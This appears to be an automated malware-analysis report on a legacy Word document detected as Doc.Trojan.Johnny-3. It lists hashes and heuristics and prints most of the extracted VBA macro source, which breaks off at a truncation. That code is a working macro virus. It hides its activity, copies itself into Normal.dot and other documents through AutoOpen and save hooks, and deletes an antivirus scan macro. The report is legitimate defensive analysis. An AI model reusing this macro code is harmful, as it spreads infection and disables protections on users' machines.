Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 32d0361094bac075…

MALICIOUS

Office (OLE)

37.5 KB Created: 2002-03-17 14:59:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: b669270167ff114b56a8988b2dc85782 SHA-1: aaf0ae085bfb68e600e27cb367ca60710b2952ae SHA-256: 32d0361094bac075444cdb37f7d64f88a19d6d8139e44f29e864ed86692c0bae
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Trojan.Johnny-3'. It contains a VBA macro with an AutoOpen function, indicating it's designed to execute automatically upon opening. The macro's logic suggests it attempts to copy itself to other documents, a common technique for macro-based malware propagation.

Heuristics 4

  • ClamAV: Doc.Trojan.Johnny-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Johnny-3
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18133 bytes
SHA-256: aed446ad6ab4f82871a07636b1522001772f016d5523c4cf86dd4970678f5e09
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "vGojohnny"

Public Sub MAIN()
'Our devise - A copy of "Go Johnny Go" on every computer !

'                                       M.H., E.R.
End Sub

Attribute VB_Name = "Presentz"

Public Sub MAIN() 'fs
Dim d$
Dim MH
Dim i
Dim A$
Dim lnh1
Dim dlg As Object
Dim iMC
Dim BI
On Error GoTo -1: On Error GoTo aend
WordBasic.ScreenUpdating (0)
WordBasic.DisableInput 1
d$ = WordBasic.[FileName$]()
MH = Len(d$)
For i = 0 To MH
A$ = WordBasic.[Right$](d$, i)
A$ = WordBasic.[Left$](WordBasic.[LTrim$](A$), 1)
If A$ = "\" Then GoTo cnt
Next i
cnt:
lnh1 = i - 1
If MH - lnh1 = 0 Then
On Error GoTo -1: On Error GoTo ecss
Set dlg = WordBasic.DialogRecord.FileSaveAs(False)
WordBasic.CurValues.FileSaveAs dlg
WordBasic.PrintStatusBar "For Help, press F1"
WordBasic.Dialog.FileSaveAs dlg
If dlg.Format = 0 Then dlg.Format = 1
MC
WordBasic.MacroCopy "Global:Presentz", WordBasic.[FileName$]() + ":FileSave"
WordBasic.FileSaveAs dlg
GoTo aend
Else
If WordBasic.[Right$](d$, 3) = "DOC" Then
MC
WordBasic.FileSaveAs Format:=1
Else
WordBasic.FileSave
End If
End If
ecss:
If Err.Number = 102 Then GoTo aend
aend:
On Error GoTo -1: On Error GoTo aen
iMC = WordBasic.CountMacros(0, 0)
For i = 1 To iMC
If WordBasic.[MacroName$](i, 0, 0) = "FileSaveAs" Then
BI = 1
End If
If WordBasic.[MacroName$](i, 0, 0) = "DrWebScan" Then
WordBasic.Organizer Delete:=1, Source:=WordBasic.[DefaultDir$](2) + "\NORMAL.DOT", Name:="DrWebScan", Tab:=3
End If
If WordBasic.[MacroName$](i, 0, 0) = "FileOpen" Then
WordBasic.Organizer Delete:=1, Source:=WordBasic.[DefaultDir$](2) + "\NORMAL.DOT", Name:="FileOpen", Tab:=3
End If
Next i
If BI = 0 Then
WordBasic.MacroCopy d$ + ":Presentw", "Global:FileSaveAs"
End If
aen:
End Sub
Private Sub MC()
Dim ds$
ds$ = WordBasic.[FileName$]()
WordBasic.MacroCopy "Global:Presentv", ds$ + ":AutoOpen"
WordBasic.MacroCopy "Global:Presentv", ds$ + ":Presentv"
WordBasic.MacroCopy "Global:Presentw", ds$ + ":Presentw"
WordBasic.MacroCopy "Global:Presentz", ds$ + ":Presentz"
WordBasic.MacroCopy "Global:vGojohnny", ds$ + ":vGojohnny"
End Sub

Attribute VB_Name = "Presentw"

Public Sub MAIN() 'fsAs
Dim d$
Dim Dl
Dim i
Dim A$
Dim lnh1
Dim dlg As Object
Dim NO$
Dim O_D_P$
Dim TMP$
Dim stt$
Dim tm$
Dim tm2$
Dim FileN$
Dim NDPh$
On Error GoTo -1: On Error GoTo aend
WordBasic.ScreenUpdating (0)
WordBasic.DisableInput 1
d$ = WordBasic.[FileName$]()
Dl = Len(d$)
For i = 0 To Dl
A$ = WordBasic.[Right$](d$, i)
A$ = WordBasic.[Left$](WordBasic.[LTrim$](A$), 1)
If A$ = "\" Then GoTo cnt
Next i
cnt:
lnh1 = i - 1
If Dl - lnh1 = 0 Then
Set dlg = WordBasic.DialogRecord.FileSaveAs(False)
WordBasic.CurValues.FileSaveAs dlg
WordBasic.Dialog.FileSaveAs dlg
If dlg.Format = 0 Then dlg.Format = 1
MC
WordBasic.FileSaveAs dlg
GoTo aend
End If
NO$ = LCase(WordBasic.[Right$](d$, lnh1))
O_D_P$ = WordBasic.[DefaultDir$](14)
TMP$ = WordBasic.[DefaultDir$](13)
stt$ = TMP$ + "\doc2.doc"
tm$ = TMP$ + "\" + NO$
tm2$ = TMP$ + "\~wrf7mhr.tmp"
If WordBasic.[Files$](tm2$) = "" Then
WordBasic.FileNewDefault
WordBasic.Insert "NAIPESVOH REHM"
WordBasic.PrintStatusBar "Starting Autosave"
WordBasic.FileSaveAs Name:=TMP$ + "\doc2.doc", Format:=0
WordBasic.FileClose
WordBasic.Rename TMP$ + "\doc2.doc", tm2$
End If
WordBasic.CopyFile FileName:=tm2$, Directory:=tm$
WordBasic.FileOpen tm$
WordBasic.PrintStatusBar "For Help, press F1"
On Error GoTo -1: On Error GoTo ife
Set dlg = WordBasic.DialogRecord.FileSaveAs(False)
WordBasic.CurValues.FileSaveAs dlg
dlg.Name = NO$
WordBasic.Dialog.FileSaveAs dlg
FileN$ = dlg.Name
NDPh$ = WordBasic.[DefaultDir$](14)
If Len(NDPh$) > 3 Then NDPh$ = NDPh$ + "\"
If dlg.Format > 1 Then
WordBasic.FileClose 2
WordBasic.Kill tm$
WordBasic.FileSaveAs N
... (truncated)